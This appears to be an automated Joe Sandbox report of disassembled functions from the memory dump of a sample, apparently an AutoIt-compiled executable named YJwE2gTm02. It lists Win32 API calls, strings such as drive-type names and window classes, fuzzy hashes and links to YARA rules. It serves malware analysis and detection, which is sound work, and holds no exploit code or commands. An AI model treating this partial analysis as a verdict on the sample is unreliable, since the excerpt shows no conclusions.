Function 00907920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241b973d68340ca70dbc711bfb826f160676f7a53a7a2e446f8e8a957a8fef69
Instruction ID: 367a0ee29f350352e479dc460f8fc393a6ea32c50075360b0106578e9ec6a722
Opcode Fuzzy Hash: 241b973d68340ca70dbc711bfb826f160676f7a53a7a2e446f8e8a957a8fef69
Instruction Fuzzy Hash: AF22A070E0460ADFDF14CFA4D881AAEB7F5FF44310F158629E816A7292EB39AD51CB50

Function 009091C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3988dcbc0f00ee59e39c91785614a4533eb35de9a3d814e7f3de911afbf4fd6
Instruction ID: d7c0bac8661204e2c3c31f67cbc2ee333fa1580f7300ed2a049ff760d072660e
Opcode Fuzzy Hash: d3988dcbc0f00ee59e39c91785614a4533eb35de9a3d814e7f3de911afbf4fd6
Instruction Fuzzy Hash: 4C02A3B1E0020AEFDB04DF54D881FAEB7B5FF44300F518569E8569B2D1EB35AA60CB91

Function 00921C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a580d16d74c71d2c79aa32a581ec54b7d02c0955ffcb728ecc9539f433e0d96a
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 8B9198765080B34ADB2D463EA53407EFFE55AA23A131A079DD4F2CB1C9FE24D974D620

Function 009219B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 275134c81a078d60312761b9ba915ac0bc79d822b1bc907cadfe234fdc5a04b3
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 619174762090F34ADB2D467AA57403DFFF55AA23A131A07AED4F2CA1C9FE14C578D620

Function 00927A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9927eaac52baa86d53c2c8690f9b0e9dc5f0c3ee30ccd7f22f9b5320f046c859
Instruction ID: 196369af2ec03f4cfa65fc6894a182a0dd79227547654bbaaa335c80be025f3e
Opcode Fuzzy Hash: 9927eaac52baa86d53c2c8690f9b0e9dc5f0c3ee30ccd7f22f9b5320f046c859
Instruction Fuzzy Hash: 7461497160873996DF3899E8B895BBFE39CDF81710F100D19E882FB28DDA159E428355

Function 00927CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8aecb2b48752c09d1dd51942049145bf9cfe6c26779f3f8a4bda297bb766c4
Instruction ID: d48a476d7eeafa717ddb24925401dc2df4afa02b67cac708f542ad857898e06c
Opcode Fuzzy Hash: 3c8aecb2b48752c09d1dd51942049145bf9cfe6c26779f3f8a4bda297bb766c4
Instruction Fuzzy Hash: FA618B3520873966DF385AE87851BBFE38CAF82700F100C59E842FB2DDDA159D42C365

Function 00921706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 442b338a18e8c6a4946c4ce41532240512d6bd2e0f6a2a880dacc51aaf10bb0d
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: DB8198775090B30DDB2D4239A57403EFFE55AA23A131A079ED4F2CB1C9EE14C578D660

Function 00972046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344fcb8d6c33cc3889235061500459f68878679a11c5e1fa6edb69b9b07e7c9f
Instruction ID: e3d451850d1a4f498a332b17f80188315e1333dc981de206f5aadbf29ea692e2
Opcode Fuzzy Hash: 344fcb8d6c33cc3889235061500459f68878679a11c5e1fa6edb69b9b07e7c9f
Instruction Fuzzy Hash: 2421D8323716158BD728CF79C81267E73E5A7A4310F188A2EE4A7C33D0DE35A944D750

Function 00982ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00982B30
DeleteObject.GDI32(00000000), ref: 00982B43
DestroyWindow.USER32 ref: 00982B52
GetDesktopWindow.USER32 ref: 00982B6D
GetWindowRect.USER32(00000000), ref: 00982B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00982CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00982CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982CF8
GetClientRect.USER32(00000000,?), ref: 00982D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00982D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982D80
GlobalLock.KERNEL32(00000000), ref: 00982D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982D98
GlobalUnlock.KERNEL32(00000000), ref: 00982DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982DA8
GlobalFree.KERNEL32(00000000), ref: 00982DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0099FC38,00000000), ref: 00982DDB
GlobalFree.KERNEL32(00000000), ref: 00982DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00982E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00982E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00982E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098303F

Strings

static, xrefs: 00982D3A, 00982E91
, xrefs: 00982FC5
AutoIt v3, xrefs: 00982CF2
DISPLAY, xrefs: 00982EA2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 746c1e16baafdf3e7cebc9c2170f1e9ade1dfdc3096333ec91c34c5e5bbd3880
Instruction ID: fc65b345617184a812391f0eecff82a802d3fbad6db1eed286f18988a014dff0
Opcode Fuzzy Hash: 746c1e16baafdf3e7cebc9c2170f1e9ade1dfdc3096333ec91c34c5e5bbd3880
Instruction Fuzzy Hash: 01028CB1910205AFDB14DFA8CC89EAE7BB9EF48714F008159F915AB2A1CB70ED41DF60

Function 009970D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0099712F
GetSysColorBrush.USER32(0000000F), ref: 00997160
GetSysColor.USER32(0000000F), ref: 0099716C
SetBkColor.GDI32(?,000000FF), ref: 00997186
SelectObject.GDI32(?,?), ref: 00997195
InflateRect.USER32(?,000000FF,000000FF), ref: 009971C0
GetSysColor.USER32(00000010), ref: 009971C8
CreateSolidBrush.GDI32(00000000), ref: 009971CF
FrameRect.USER32(?,?,00000000), ref: 009971DE
DeleteObject.GDI32(00000000), ref: 009971E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00997230
FillRect.USER32(?,?,?), ref: 00997262
GetWindowLongW.USER32(?,000000F0), ref: 00997284

Part of subcall function 009973E8: GetSysColor.USER32(00000012), ref: 00997421
Part of subcall function 009973E8: SetTextColor.GDI32(?,?), ref: 00997425
Part of subcall function 009973E8: GetSysColorBrush.USER32(0000000F), ref: 0099743B
Part of subcall function 009973E8: GetSysColor.USER32(0000000F), ref: 00997446
Part of subcall function 009973E8: GetSysColor.USER32(00000011), ref: 00997463
Part of subcall function 009973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00997471
Part of subcall function 009973E8: SelectObject.GDI32(?,00000000), ref: 00997482
Part of subcall function 009973E8: SetBkColor.GDI32(?,00000000), ref: 0099748B
Part of subcall function 009973E8: SelectObject.GDI32(?,?), ref: 00997498
Part of subcall function 009973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009974B7
Part of subcall function 009973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009974CE
Part of subcall function 009973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009974DB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: ad98377914b13e6b534293afbd767e9548e38414b4f6a1d3bf3f54399cfbfde9
Instruction ID: ee376002ed62a75cad87c729b8f574e84f1c98b8f66f180e5b8658da005d132e
Opcode Fuzzy Hash: ad98377914b13e6b534293afbd767e9548e38414b4f6a1d3bf3f54399cfbfde9
Instruction Fuzzy Hash: F8A1A6B202C301BFDB109F68DC48E5BB7A9FF49321F100A1AF562961E1DB75E944DB52

Function 00918D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00918E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00956AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00956AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00956F43

Part of subcall function 00918F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00918BE8,?,00000000,?,?,?,?,00918BBA,00000000,?), ref: 00918FC5

SendMessageW.USER32(?,00001053), ref: 00956F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00956F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00956FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00956FB7

Strings

0, xrefs: 00956DCF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: c1f0c7610b22751dcc32c057c3f961212cc774e7a7e15721d557bca7a8db4dbc
Instruction ID: 81313335f867166381565f92f3ef9eac9706bb469d1f3efe43e5adb530baf961
Opcode Fuzzy Hash: c1f0c7610b22751dcc32c057c3f961212cc774e7a7e15721d557bca7a8db4dbc
Instruction Fuzzy Hash: 4F12EF71209201EFDB25DF29DC54BA6B7F9FB44302F94442AF8858B261CB31EC99EB51

Function 00982711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0098273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0098286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009828A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009828B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00982900
GetClientRect.USER32(00000000,?), ref: 0098290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00982955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00982964
GetStockObject.GDI32(00000011), ref: 00982974
SelectObject.GDI32(00000000,00000000), ref: 00982978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00982988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00982991
DeleteDC.GDI32(00000000), ref: 0098299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009829C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 009829DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00982A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00982A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00982A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00982A77
GetStockObject.GDI32(00000011), ref: 00982A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00982A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00982A97

Strings

static, xrefs: 0098294F, 00982A71
AutoIt v3, xrefs: 009828F8
msctls_progress32, xrefs: 00982A13
DISPLAY, xrefs: 0098295A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: ca2204b46d022264f296c83086b520e9ab02b7bd7c1f64d47d6bf8346e37a53f
Instruction ID: 318b911d456dd2621e8f35e950809ec9a1a50ab5e6c0e43531f4072e33b72065
Opcode Fuzzy Hash: ca2204b46d022264f296c83086b520e9ab02b7bd7c1f64d47d6bf8346e37a53f
Instruction Fuzzy Hash: 2AB16CB6A50205BFEB14DFA8CC49FAEBBA9EB48711F008115F915E72D0D770AD40CBA4

Function 00974ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00974AED
GetDriveTypeW.KERNEL32(?,0099CB68,?,\\.\,0099CC08), ref: 00974BCA
SetErrorMode.KERNEL32(00000000,0099CB68,?,\\.\,0099CC08), ref: 00974D36

Strings

Fixed, xrefs: 00974C09
RAID, xrefs: 00974CBB
SSD, xrefs: 00974C4A
Fibre, xrefs: 00974CAD
SSA, xrefs: 00974CA6
CDROM, xrefs: 00974BFB
1394, xrefs: 00974C9F
ATAPI, xrefs: 00974C91
SATA, xrefs: 00974CD0
FileBackedVirtual, xrefs: 00974CEC
PhysicalDrive, xrefs: 00974B76
MMC, xrefs: 00974CDE
Removable, xrefs: 00974C10, 00974C15
SAS, xrefs: 00974CC9
RAMDisk, xrefs: 00974BF4
\\.\, xrefs: 00974B3F
SCSI, xrefs: 00974C8A
Unknown, xrefs: 00974BED, 00974C83
ATA, xrefs: 00974C98
iSCSI, xrefs: 00974CC2
USB, xrefs: 00974CB4
Virtual, xrefs: 00974CE5
Network, xrefs: 00974C02

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 4dcd09a90596e2c276ed719ac4cc9c7f032eeeba19d7156468dd965aad2385c8
Instruction ID: f7e2858cd0751d8fd1f7aa543af65b1d098d7817da9398f16286487a21fd4f8a
Opcode Fuzzy Hash: 4dcd09a90596e2c276ed719ac4cc9c7f032eeeba19d7156468dd965aad2385c8
Instruction Fuzzy Hash: 04619272B452059FCB15DB18C981FAD77A4AB84304B28C419F88EAB2D3DB35ED41DB42

Function 009973E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00997421
SetTextColor.GDI32(?,?), ref: 00997425
GetSysColorBrush.USER32(0000000F), ref: 0099743B
GetSysColor.USER32(0000000F), ref: 00997446
CreateSolidBrush.GDI32(?), ref: 0099744B
GetSysColor.USER32(00000011), ref: 00997463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00997471
SelectObject.GDI32(?,00000000), ref: 00997482
SetBkColor.GDI32(?,00000000), ref: 0099748B
SelectObject.GDI32(?,?), ref: 00997498
InflateRect.USER32(?,000000FF,000000FF), ref: 009974B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009974CE
GetWindowLongW.USER32(00000000,000000F0), ref: 009974DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0099752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00997554
InflateRect.USER32(?,000000FD,000000FD), ref: 00997572
DrawFocusRect.USER32(?,?), ref: 0099757D
GetSysColor.USER32(00000011), ref: 0099758E
SetTextColor.GDI32(?,00000000), ref: 00997596
DrawTextW.USER32(?,009970F5,000000FF,?,00000000), ref: 009975A8
SelectObject.GDI32(?,?), ref: 009975BF
DeleteObject.GDI32(?), ref: 009975CA
SelectObject.GDI32(?,?), ref: 009975D0
DeleteObject.GDI32(?), ref: 009975D5
SetTextColor.GDI32(?,?), ref: 009975DB
SetBkColor.GDI32(?,?), ref: 009975E5

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c8f6d0f760e00a1e1ee62c708776f07df08893ab2e04f7f4f6ad04d3b18c36eb
Instruction ID: d3b2225bcb3bf0e2aab8ad5521bb3e96da6f62a307ee8e30cdfc4b35fdd37277
Opcode Fuzzy Hash: c8f6d0f760e00a1e1ee62c708776f07df08893ab2e04f7f4f6ad04d3b18c36eb
Instruction Fuzzy Hash: 186183B2918218AFDF119FA8DC49EEEBF79EF08320F114116F915AB2A1D7749940DF90

Function 00990FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00991128
GetDesktopWindow.USER32 ref: 0099113D
GetWindowRect.USER32(00000000), ref: 00991144
GetWindowLongW.USER32(?,000000F0), ref: 00991199
DestroyWindow.USER32(?), ref: 009911B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009911ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0099121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00991232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00991245
IsWindowVisible.USER32(00000000), ref: 009912A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009912BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009912D0
GetWindowRect.USER32(00000000,?), ref: 009912E8
